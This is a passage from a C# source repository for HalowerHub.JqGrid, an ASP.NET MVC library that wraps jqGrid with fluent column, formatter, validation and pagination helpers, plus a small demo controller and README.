return filderSortOrder.Select(filedName => type.GetProperty(filedName).GetValue(t, null) == null
? string.Empty
: type.GetProperty(filedName).GetValue(t, null).ToString()).ToArray();
}
/// <summary>
/// Build a search drop-down
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="keySelector"></param>
/// <param name="elementSelector"></param>
/// <returns></returns>
public static string BuildSelect<T>(this IEnumerable<T> list, Func<T, object> keySelector, Func<T, object> elementSelector) where T : class
{
var dic = list.ToDictionary(keySelector, elementSelector);
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>Please select</option>");
foreach (var item in dic)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// Tree grid
/// </summary>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <param name="expression"></param>
/// <typeparam name="T"></typeparam>
/// <returns></returns>
public static string ToTreeGrid<T>(this IEnumerable<T> list, Controller baseContent, Expression<Func<T, bool>> expression = null) where T : JGridTree
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var predicate = PredicateBuilder.True<T>();
if (expression != null) predicate = predicate.And(expression);
if (!string.IsNullOrEmpty(pageParams.Filters))
predicate = GridSearchPredicate.MultiSearchExpression<T>(pageParams.Filters);
if (string.IsNullOrEmpty(pageParams.Filters) && !string.IsNullOrEmpty(pageParams.SearchField))
predicate = GridSearchPredicate.SingleSearchExpression<T>(pageParams.SearchField, pageParams.SearchOper,
pageParams.SearchString);
var recordes =
list.Where(predicate.Compile())
.Skip((pageParams.PageIndex - 1) * pageParams.PageSize)
.Take(pageParams.PageSize)
.ToList();
recordes.Sort(
new GridListSort<T>(
string.IsNullOrEmpty(pageParams.SortName) ? pageParams.Gridkey : pageParams.SortName,
pageParams.Sord == "desc").Compare);
var gridCells = recordes.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p,(pageParams.Displayfileds + ",TreeLevel,Parent,IsLeaf,Expanded").Split(','))
}).ToList();
var result =
new
{
pageParams.PageIndex,
records = list.Count(predicate.Compile()),
rows = gridCells,
total = (Math.Ceiling((double)list.Count() / pageParams.PageSize))
}.ToSerializer();
return result;
}
}
}
<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-03-21
** Description: jqGrid query extensions
*****************************************************/
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Grid factory extension methods.
/// </summary>
public static class GridFactoryExtensions
{
/// <summary>
/// Grid
/// </summary>
/// <param name="htmlHelper">Html 助手</param>
/// <returns>Grid 工厂</returns>
public static GridFacotory JqGridKit(this HtmlHelper htmlHelper)
{
return new GridFacotory(htmlHelper);
}
/// <summary>
/// Grid
/// </summary>
/// <typeparam name="TModel">模型类型</typeparam>
/// <param name="htmlHelper">Html 助手</param>
/// <returns>Grid 工厂</returns>
public static GridFacotory<TModel> JqGridKit<TModel>(this HtmlHelper<TModel> htmlHelper)
{
return new GridFacotory<TModel>(htmlHelper);
}
}
}<file_sep>using System.Reflection;
using System.Runtime.InteropServices;
// General information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("HalowerHub.JqGrid")]
[assembly: AssemblyDescription("HalowerHub.JqGrid (ForMvc) is the most simple and popular JqGrid plugin that can be used to quickly create a commercial request form. We are also pursuing \"write less, do more\"; if you have any questions or need help with it you can send an email to me or contact me at QQ:121625933")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Halower(<EMAIL>)")]
[assembly: AssemblyProduct("HalowerHub.JqGrid")]
[assembly: AssemblyCopyright("Copyright © Halower 2015")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("3059fb75-1026-4ec8-a010-d819415c4600")]
// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision
// numbers by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("5.1.1.1")]
[assembly: AssemblyFileVersion("5.1.1.1")]<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class JGridTree
{
[JsonProperty("level")]
public virtual string TreeLevel { get; set; }
[JsonProperty("isLeaf")]
public virtual string IsLeaf { get; set; }
[JsonProperty("parent")]
public virtual string Parent { get; set; }
[JsonProperty("expanded")]
public virtual string Expanded { get; set; }
}
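// A hedged sketch (not shipped with the library) of a concrete tree-grid row model:
// rows inherit JGridTree and add their own data properties, while the four virtual
// properties above carry the jqGrid adjacency-model metadata (level/isLeaf/parent/expanded).
/*
public class MenuNode : JGridTree
{
    public int Id { get; set; }
    public string Title { get; set; }
}
*/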
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-01-21
** Description: jqGrid extensions
*****************************************************/
namespace HalowerHub.JqGrid
{
public class GridConfigBuilder
{
#region Properties
private GridConfiguration GridConfiguration { get; set; }
#endregion
#region Constructors
public GridConfigBuilder()
{
GridConfiguration = new GridConfiguration();
}
private GridConfigBuilder(string gridId) : this()
{
}
public GridConfigBuilder(string gridId, GridConfiguration gridConfiguration) : this(gridId)
{
GridConfiguration = gridConfiguration;
}
#endregion
#region Fields
#endregion
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ResponseDatas
{
/// <summary>
/// XML data
/// </summary>
Xml,
/// <summary>
/// XML string
/// </summary>
Xmlstring,
/// <summary>
/// JSON data
/// </summary>
Json,
/// <summary>
/// JSON string
/// </summary>
Jsonstring,
/// <summary>
/// Client-side data (array)
/// </summary>
Local,
/// <summary>
/// JavaScript data
/// </summary>
Javascript,
/// <summary>
/// Data returned by a function
/// </summary>
Function
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension grid column properties
*****************************************************/
using System.Collections.Generic;
namespace HalowerHub.JqGrid
{
public static class GridColumnExtension
{
/// <summary>
/// Sets the initial column width, in pixels or as a percentage.
/// </summary>
/// <param name="width">Initial width</param>
/// <returns></returns>
public static GridColumn Width(this GridColumn col, int width)
{
col.Width = width;
return col;
}
/// <summary>
/// Defines whether the column is hidden on initialization.
/// </summary>
public static GridColumn Hidden(this GridColumn col, bool hidden = true)
{
col.Hidden = hidden;
return col;
}
/// <summary>
/// Sets the content alignment of the field.
/// </summary>
/// <param name="contentAlign">Content alignment ("left", "center" or "right")</param>
/// <returns></returns>
public static GridColumn ContentAlign(this GridColumn col, string contentAlign)
{
col.Align = contentAlign;
return col;
}
/// <summary>
/// Defines the field as editable and configures its editor.
/// </summary>
public static GridColumn Editable(this GridColumn col, ColumnEdits edittype, string editoptions, EditRules rules = null)
{
col.Editable = true;
col.EditType = edittype.ToString().ToLower();
col.Editoptions = "&{" + editoptions + "}&";
col.EditRule = rules;
return col;
}
/// <summary>
/// Defines the edit validation rules.
/// </summary>
/// <param name="col"></param>
/// <param name="editRules"></param>
/// <returns></returns>
public static GridColumn EditRules(this GridColumn col, EditRules editRules)
{
col.EditRule = editRules;
return col;
}
/// <summary>
/// Defines the cell formatter for the column.
/// </summary>
public static GridColumn Formatter(this GridColumn col, CellFormatters cellformater,Formatoption formatoption=null)
{
col.Formatter ="\""+cellformater.ToString().ToLower()+"\"";
col.Formatoptions =formatoption;
return col;
}
/// <summary>
/// Integer formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="thousandsSeparator">Thousands separator</param>
/// <param name="defautlValue">Default value used when there is no data</param>
/// <returns></returns>
public static GridColumn IntegerFormatter(this GridColumn col,string thousandsSeparator,string defautlValue=null)
{
col.Formatter = "\"" + CellFormatters.Integer.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue };
return col;
}
/// <summary>
/// Number formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="thousandsSeparator">Thousands separator</param>
/// <param name="decimalPlaces">Number of decimal places to keep</param>
/// <param name="decimalSeparator">Decimal separator, e.g. "."</param>
/// <param name="defautlValue">Default value used when there is no data</param>
/// <returns></returns>
public static GridColumn NumberFormatter(this GridColumn col, string thousandsSeparator,string decimalPlaces=null, string decimalSeparator=null,string defautlValue = null)
{
col.Formatter = "\"" + CellFormatters.Number.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue,DecimalPlaces= decimalPlaces,DecimalSeparator=decimalSeparator };
return col;
}
/// <summary>
/// Currency formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="prefix">Prefix</param>
/// <param name="suffix">Suffix</param>
/// <param name="thousandsSeparator">Thousands separator</param>
/// <param name="decimalPlaces">Number of decimal places to keep</param>
/// <param name="decimalSeparator">Decimal separator, e.g. "."</param>
/// <param name="defautlValue">Default value used when there is no data</param>
/// <returns></returns>
public static GridColumn CurrencyFormatter(this GridColumn col,string prefix="¥", string decimalPlaces = null, string suffix=null, string thousandsSeparator=null, string decimalSeparator = null, string defautlValue = null)
{
col.Formatter = "\"" + CellFormatters.Currency.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption {Prefix=prefix,Suffix=suffix,ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue, DecimalPlaces = decimalPlaces, DecimalSeparator = decimalSeparator };
return col;
}
/// <summary>
/// Date formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="srcformat">Source format</param>
/// <param name="newformat">Target format</param>
/// <returns></returns>
public static GridColumn DateFormatter(this GridColumn col, string srcformat,string newformat)
{
col.Formatter = "\"" + CellFormatters.Date.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { Srcformat = srcformat, Newformat = newformat };
return col;
}
/// <summary>
/// Link formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="baseLinkUrl">URL of the link added to the current cell, e.g. "jq/query.action"</param>
/// <param name="addParam">Extra parameters appended after baseLinkUrl, e.g. "&name=aaaa"</param>
/// <param name="idName">Name of the id parameter appended after baseLinkUrl (by default ".action?id=1"; with idName="name" it becomes ".action?name=1", the value being the current rowid)</param>
/// <returns></returns>
public static GridColumn LinkFormatter(this GridColumn col, string baseLinkUrl=null, string addParam=null,string idName=null)
{
col.Formatter = "\"" + CellFormatters.Showlink.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { BaseLinkUrl = baseLinkUrl, addParam = addParam,IdName= idName };
return col;
}
/// <summary>
/// Checkbox formatter.
/// </summary>
/// <param name="col"></param>
/// <param name="disabled">Whether the checkbox is disabled</param>
/// <returns></returns>
public static GridColumn CheckBoxFormatter(this GridColumn col,bool disabled)
{
col.Formatter = "\"" + CellFormatters.Checkbox.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { Disabled = disabled};
return col;
}
/// <summary>
/// Enables searching on the column.
/// </summary>
public static GridColumn Searchable(this GridColumn col, CellTypes filedType = CellTypes.String)
{
col.Search = true;
col.SearchFiledType = filedType;
col.SearchType ="text";
return col;
}
public static GridColumn SelectSearchable(this GridColumn col, string selectDataUrl)
{
col.Search = true;
col.SearchType ="select";
col.SelectDataSourceUrl = selectDataUrl;
return col;
}
/// <summary>
/// Enables sorting.
/// </summary>
/// <param name="columnSorts">Sort type</param>
/// <returns></returns>
public static GridColumn Sortable(this GridColumn col, ColumnSorts columnSorts = ColumnSorts.Text)
{
col.Sortable = true;
col.SortType = columnSorts.ToString().ToLower();
return col;
}
/// <summary>
/// Sets the text alignment.
/// </summary>
/// <param name="col"></param>
/// <param name="align">Alignment ("left", "center" or "right")</param>
/// <returns></returns>
public static GridColumn TextAlign(this GridColumn col, string align)
{
col.Align = align;
return col;
}
/// <summary>
/// Marks the column for cell merging by emitting a cellattr id based on the field name.
/// </summary>
/// <param name="col"></param>
/// <returns></returns>
public static GridColumn Merger(this GridColumn col)
{
var templete = @"&function(rowId, tv, rawObject, cm, rdata){return 'id=@FiledName'+ rowId;}&";
col.CellAttr = templete.Replace("@FiledName", "\""+ col.Field+"\"");
return col;
}
}
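// Hedged usage sketch: these extension methods are designed to chain on a column.
// "x.Price" and the numbers below are illustrative assumptions, not part of the library.
/*
var priceColumn = g.GridColumn(x => x.Price, 120)
    .CurrencyFormatter(prefix: "$", decimalPlaces: "2")
    .Sortable(ColumnSorts.Number)
    .Searchable(CellTypes.Number)
    .ContentAlign("right");
*/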
}
<file_sep>namespace HalowerHub.JqGrid
{
public interface IGridColumn
{
string Field { get; set; }
string Index { get; set; }
int? Width { get; set; }
string Align { get; set; }
string DisplayName { get; set; }
bool Sortable { get; set; }
bool Hidden { get; set; }
bool Editable { get; set; }
bool Search { get; set; }
string SearchType { get; set; }
string SortType { get; set; }
string EditType { get; set; }
string Searchoptions { get; }
string Formatter { get; set; }
string CellAttr { get; set; }
CellTypes SearchFiledType { get; set; }
}
}<file_sep>using System;
using System.Linq.Expressions;
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Grid factory.
/// </summary>
public class GridFacotory
{
/// <summary>
/// Html helper.
/// </summary>
internal HtmlHelper HtmlHelper { get; set; }
/// <summary>
/// Initializes a new Grid factory.
/// </summary>
/// <param name="htmlHelper">Html helper</param>
public GridFacotory(HtmlHelper htmlHelper)
{
HtmlHelper = htmlHelper;
}
}
/// <summary>
/// Generic Grid factory.
/// </summary>
/// <typeparam name="TModel">Model type</typeparam>
public sealed class GridFacotory<TModel> : GridFacotory
{
/// <summary>
/// Html helper.
/// </summary>
public new HtmlHelper<TModel> HtmlHelper { get; set; }
/// <summary>
/// Initializes a new Grid factory.
/// </summary>
/// <param name="htmlHelper">Html helper</param>
public GridFacotory(HtmlHelper<TModel> htmlHelper) : base(htmlHelper)
{
HtmlHelper = htmlHelper;
}
/// <summary>
/// Creates a grid column.
/// </summary>
/// <typeparam name="TProperty">Property type</typeparam>
/// <param name="expression">Property expression</param>
/// <param name="width">Width</param>
/// <param name="isEdit">Whether editing is allowed</param>
public GridColumn GridColumn<TProperty>(Expression<Func<TModel, TProperty>> expression, int? width = null, bool isEdit = false)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
var column = new GridColumn(currentProp.PropertyName, currentProp.DisplayName)
{
Width = width ?? default(int),
Editable = isEdit
};
return column;
}
public GridColumn GridColumn<TProperty>(Expression<Func<TModel, TProperty>> expression, int width, string formatter)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
var column = new GridColumn(currentProp.PropertyName, currentProp.DisplayName)
{
Width = width,
Formatter = formatter
};
return column;
}
public GridColumn GridColumn(string name, int? width, string formatter)
{
var column = new GridColumn("", name)
{
Width = width ?? default(int),
Formatter = formatter
};
return column;
}
/// <summary>
/// Creates a sort parameter from a property.
/// </summary>
/// <typeparam name="TProperty">Property type</typeparam>
/// <param name="expression">Property expression</param>
public string Param<TProperty>(Expression<Func<TModel, TProperty>> expression)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
return currentProp.PropertyName;
}
/// <summary>
/// Creates a merged (grouped) header definition.
/// </summary>
/// <typeparam name="TProperty">Property type</typeparam>
/// <param name="expression">Property expression</param>
public GroupHeader HeaderStruct<TProperty>(Expression<Func<TModel, TProperty>> expression, int colSpan, string content)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
return new GroupHeader(currentProp.PropertyName, colSpan, content);
}
}
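// Illustrative sketch (assumptions marked): in a Razor view typed "@model OrderDto",
// the factory builds strongly-typed columns, sort parameters and header groups.
// "OrderDto", "Amount", "Customer" and "Id" are hypothetical model members.
/*
var g = Html.JqGridKit();
var amountColumn = g.GridColumn(o => o.Amount, 100);
var sortKey = g.Param(o => o.Id);
var header = g.HeaderStruct(o => o.Customer, 2, "<b>Customer info</b>");
*/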
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Toolkit for building cell and editor content.
/// </summary>
public static class CellBuildKit
{
/// <summary>
/// Builds a search dropdown (select) from a sequence.
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="keySelector"></param>
/// <param name="elementSelector"></param>
/// <returns></returns>
public static string SearchSelect<T>(this IEnumerable<T> list, Func<T, object> keySelector, Func<T, object> elementSelector) where T : class
{
var dic = list.ToDictionary(keySelector, elementSelector);
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>请选择</option>");
foreach (var item in dic)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// Builds a search dropdown from a dictionary.
/// </summary>
/// <param name="selectDictionary"></param>
/// <returns></returns>
public static string SearchSelect(Dictionary<string,string> selectDictionary)
{
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>请选择</option>");
foreach (var item in selectDictionary)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// Builds edit options for a select editor.
/// </summary>
/// <param name="selectDictionary"></param>
/// <returns></returns>
public static string EditSelect(Dictionary<string, string> selectDictionary)
{
var selectBuilder = new StringBuilder("value:'");
foreach (var item in selectDictionary)
{
selectBuilder.Append(item.Key + ":" + item.Value+";");
}
selectBuilder.Remove(selectBuilder.Length - 1, 1).Append("'");
return selectBuilder.ToString();
}
/// <summary>
/// Builds edit options for a checkbox editor.
/// </summary>
/// <returns></returns>
public static string EditCheckbox(string ckv,string unckv)
{
return string.Format("value:'{0}:{1}'", ckv, unckv);
}
/// <summary>
/// Builds edit options for a textarea editor.
/// </summary>
/// <param name="rows"></param>
/// <param name="cols"></param>
/// <returns></returns>
public static string EditTextarea(int rows, int cols)
{
return string.Format("rows:'{0}',cols:'{1}'", rows, cols);
}
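// Hedged usage sketch: feeding the helpers above into column search/edit options.
// The dictionary contents are illustrative assumptions.
/*
var states = new Dictionary<string, string> { { "1", "Open" }, { "0", "Closed" } };
string searchHtml = CellBuildKit.SearchSelect(states);           // "<select>...</select>" for a search filter
string selectOpts = CellBuildKit.EditSelect(states);             // "value:'1:Open;0:Closed'" for a select editor
string areaOpts = CellBuildKit.EditTextarea(rows: 4, cols: 40);  // "rows:'4',cols:'40'"
*/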
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension grid cell properties
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
[JsonObject]
public class GridCell
{
[JsonProperty("id")]
public string Id { get; set; }
[JsonProperty("cell")]
public string[] Cell { get; set; }
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum SortOrders
{
Desc,
Asc
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnSorts
{
Int,
Number,
Date,
Text
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension properties
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class SubGridModel
{
[JsonProperty("name")]
public string[] FiledNames { get; set; }
[JsonProperty("width")]
public int[] FiledWidths { get; set; }
[JsonProperty("align")]
public string[] FiledAligns { get; set; }
[JsonProperty("params")]
public string[] Params { get; set; }
}
}<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class Formatoption
{
/// <summary>
/// Thousands separator [currency, integer, number]
/// </summary>
[JsonProperty("thousandsSeparator")]
public string ThousandsSeparator { get; set; }
/// <summary>
/// Default value when there is no data [integer, number]
/// </summary>
[JsonProperty("defaulValue")]
public string DefaulValue { get; set; }
/// <summary>
/// Decimal separator, e.g. "." [currency, number]
/// </summary>
[JsonProperty("decimalSeparator")]
public string DecimalSeparator { get; set; }
/// <summary>
/// Number of decimal places to keep [currency, number]
/// </summary>
[JsonProperty("decimalPlaces")]
public string DecimalPlaces { get; set; }
/// <summary>
/// Prefix [currency]
/// </summary>
[JsonProperty("prefix")]
public string Prefix { get; set; }
/// <summary>
/// Suffix [currency]
/// </summary>
[JsonProperty("suffix")]
public string Suffix { get; set; }
/// <summary>
/// Source format [date]
/// </summary>
[JsonProperty("srcformat")]
public string Srcformat { get; set; }
/// <summary>
/// Target format [date]
/// </summary>
[JsonProperty("newformat")]
public string Newformat { get; set; }
/// <summary>
/// URL of the link added to the current cell [showlink]
/// </summary>
[JsonProperty("baseLinkUrl")]
public string BaseLinkUrl { get; set; }
/// <summary>
/// Extra parameters appended after baseLinkUrl, e.g. "&name=aaaa" [showlink]
/// </summary>
[JsonProperty("addParam")]
public string addParam { get; set; }
/// <summary>
/// Name of the id parameter appended after baseLinkUrl, e.g. ".action?id=1" [showlink]
/// </summary>
[JsonProperty("idName")]
public string IdName { get; set; }
/// <summary>
/// When true, the checkbox cannot be edited [checkbox]
/// </summary>
[JsonProperty("disabled ")]
public bool Disabled { get; set; }
}
}<file_sep>using System;
using System.Web;
using System.Web.Caching;
namespace HalowerHub.JqGrid
{
public class CacheHelper
{
public static object Get(string cacheKey)
{
return HttpRuntime.Cache[cacheKey];
}
public static void Add(string cacheKey, object obj, int cacheMinute)
{
HttpRuntime.Cache.Insert(cacheKey, obj, null, DateTime.Now.AddMinutes(cacheMinute),
Cache.NoSlidingExpiration, CacheItemPriority.Normal, null);
}
}
}<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Edit validation rules used by jqGrid form validation, similar to regular-expression checks.
/// </summary>
public class EditRules
{
private string _customfunc;
/// <summary>
/// Constructor.
/// </summary>
/// <param name="required">Whether the field is required when editing</param>
/// <param name="edithidden">Only effective in form-editing mode; when true, hidden fields can also be edited</param>
/// <param name="number">When true, an error is raised if the input is not a number or is empty</param>
/// <param name="integer">Whether the value must be an integer</param>
/// <param name="minValue">Minimum value</param>
/// <param name="maxValue">Maximum value</param>
/// <param name="email">Whether the value must be a valid e-mail address</param>
/// <param name="url">Whether the value must be a valid URL</param>
/// <param name="date">When true, the input must be a date in ISO format ("Y-m-d"); otherwise an error message is shown</param>
/// <param name="time">When true, the input must be a time; currently only "hh:mm" with an optional am/pm suffix is supported</param>
/// <param name="customfun">Name of a JS function that returns an array: first item true/false for success; second item, used when the first is false, the error message shown to the user, e.g. [false, "Please enter valid value"]</param>
public EditRules(bool required=false,bool edithidden=false, bool number = false, bool integer = false, double? minValue = null ,double? maxValue=null,bool email=false, bool url= false, bool date= false, bool time= false, string customfun=null)
{
Required = required;
Edithidden = edithidden;
Number = number;
Integer = integer;
MinValue = minValue;
MaxValue = maxValue;
Email = email;
Url = url;
Date = date;
Time = time;
CustomFunc = customfun;
}
/// <summary>
/// Sets whether the field is required (cannot be empty) when editing.
/// </summary>
[JsonProperty("required")]
public bool Required { get; set; }
/// <summary>
/// Only effective in form-editing mode; when true, hidden fields can also be edited.
/// </summary>
[JsonProperty("edithidden")]
public bool Edithidden { get; set; }
/// <summary>
/// When true, an error is raised if the input is not a number or is empty.
/// </summary>
[JsonProperty("number")]
public bool Number { get; set; }
/// <summary>
/// Whether the value must be an integer.
/// </summary>
[JsonProperty("integer")]
public bool Integer { get; set; }
/// <summary>
/// Minimum value.
/// </summary>
[JsonProperty("minValue")]
public double? MinValue { get; set; }
/// <summary>
/// Maximum value.
/// </summary>
[JsonProperty("maxValue")]
public double? MaxValue { get; set; }
/// <summary>
/// Whether the value must be a valid e-mail address.
/// </summary>
[JsonProperty("email")]
public bool Email { get; set; }
/// <summary>
/// Whether the value must be a valid URL.
/// </summary>
[JsonProperty("url")]
public bool Url { get; set; }
/// <summary>
/// When true, the input must be a date in ISO format ("Y-m-d"); otherwise an error message is shown.
/// </summary>
[JsonProperty("date")]
public bool Date { get; set; }
/// <summary>
/// When true, the input must be a time; currently only "hh:mm" with an optional am/pm suffix is supported.
/// </summary>
[JsonProperty("time")]
public bool Time { get; set; }
/// <summary>
/// Whether a custom validation function is used; set automatically when CustomFunc is assigned.
/// </summary>
[JsonProperty("custom")]
internal bool Custom { get; set; }
/// <summary>
/// The function must return an array: first item true/false for validation success; second item, used when the first is false, the error message shown to the user, e.g. [false, "Please enter valid value"].
/// </summary>
[JsonProperty("custom_func")]
public string CustomFunc {
get
{
return _customfunc;
}
set
{
if (!string.IsNullOrEmpty(value))
{
Custom = true;
_customfunc = value;
}
}
}
}
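// Illustrative sketch: attaching validation rules to an editable column.
// The field name "Age" is an assumption for the example.
/*
var ageRules = new EditRules(required: true, integer: true, minValue: 0, maxValue: 150);
var ageColumn = new GridColumn("Age", "Age").EditRules(ageRules);
*/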
}
/*
Edithidden: only effective in form-editing mode; set to true to allow hidden fields to be edited.
required: sets whether the field may be empty when editing (whether it is required).
Number: when true, an error is raised if the input is not a number or is empty.
Integer: whether the value must be an integer.
minValue: minimum value
maxValue: maximum value
Email: whether the value must be a valid e-mail address.
Url: checks whether the value is a valid URL.
date:
time:
custom: when true, validation is done through a custom JS function defined in custom_func.
custom_func: the value passed to the function is the value to validate.
*/
<file_sep>namespace HalowerHub.JqGrid
{
/// <summary>
/// Commands used to render and initialize the grid.
/// </summary>
public class RenderInitCommand
{
/// <summary>
/// Grid id
/// </summary>
public string GridId { get; set; }
/// <summary>
/// Table initialization command
/// </summary>
public string TableInitCommand { get; set; }
/// <summary>
/// Bottom navigation bar initialization command
/// </summary>
public string BottomNavBarInitCommand { get; set; }
/// <summary>
/// Group header (merged header) initialization command
/// </summary>
public string GroupHeaderInitCommand { get; set; }
/// <summary>
/// Merged column initialization command
/// </summary>
public string MergerColumnInitCommand { get; set; }
/// <summary>
/// Pager id
/// </summary>
public string PagerId { get; set; }
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnSearchs
{
Text,
Select
}
}<file_sep>using System.Collections.Generic;
using System.Web.Mvc;
using HalowerHub.JqGrid;
using JQgridTest.Models;
namespace JQgridTest.Controllers
{
public class HomeController : Controller
{
// GET: Home
public ActionResult Index()
{
return View();
}
public ContentResult PersonListData()
{
var persons = new List<Person>
{
new Person {Id = 1, Name = " 小1", Password = "<PASSWORD>"},
new Person {Id = 2, Name = "小2", Password = "<PASSWORD>"},
new Person {Id = 3, Name = "小3", Password = "<PASSWORD>"},
new Person {Id = 4, Name = "小4", Password = "<PASSWORD>"},
new Person {Id = 5, Name = "小5", Password = "<PASSWORD>"}
};
return Content(persons.Pagination(this));
}
}
}<file_sep># JqGridForMvc
JqGridForMvc is a simple and popular jqGrid plugin for ASP.NET MVC that can be used to quickly create commercial-grade grid forms. We also pursue "write less, do more". If you have any questions or need help with it, you can send me an email or contact me.
# Installation
``` Install-Package HalowerHub.Jqgrid```
# Sample Code

Here is a simple example. JqGridForMvc already supports the most common jqGrid operations; supplementary examples will be added as time allows.
```
@model UserDto
@{
var g = Html.JqGridKit();
}
<div class="row" style="margin-top: 10px">
@(
g.JqGrid("userlistGrid", g.Param(p => p.Id)).MainGrid(
g.GridColumn(x => x.Id, 300),
g.GridColumn(x => x.UserName, 300).Searchable(),
g.GridColumn(x => x.PhoneNumber, 300).Searchable(),
g.GridColumn("options",150, "custom html fragment")
)
.Caption("user grid").Height("150")
.Url(Url.Action("UserListData", "Account")).Multiselect()
.Pager().PerClearCache().MultiSearch().AutoWidth()
.BuiltInOperation(GridOperators.Refresh | GridOperators.Search | GridOperators.Add)
)
</div>
```
or: SubGrid

# Back-end code (only one line)
```
public ContentResult UserListData()
{
return Content(dataSource.Pagination(this));
}
```
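
A hedged sketch of the pieces the samples above assume: a view model whose `Display` attributes supply the column captions, and nothing more on the server side. The `UserDto` members here are illustrative, not prescribed by the library.
```
using System.ComponentModel.DataAnnotations;

public class UserDto
{
    public int Id { get; set; }

    [Display(Name = "User name")]
    public string UserName { get; set; }

    [Display(Name = "Phone")]
    public string PhoneNumber { get; set; }
}
```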
<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnEdits
{
Text,
Textarea,
Select,
Checkbox,
Password,
Button,
Image,
File
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-03-21
** Description: jqGrid query extensions
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public static class SerializerToolKit
{
public static string IgnoreNullSerialize(this object result)
{
return JsonConvert.SerializeObject(result,
new JsonSerializerSettings {NullValueHandling = NullValueHandling.Ignore});
}
public static string ToSerializer(this object result)
{
return JsonConvert.SerializeObject(result);
}
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-03-21
** Description: jqGrid query extensions
*****************************************************/
namespace HalowerHub.JqGrid
{
public static class GridExtensions
{
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory<TModel> factory, string gridId)
{
return new GridGenerator<TModel>(gridId);
}
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory<TModel> factory, string gridId, string gridKey)
{
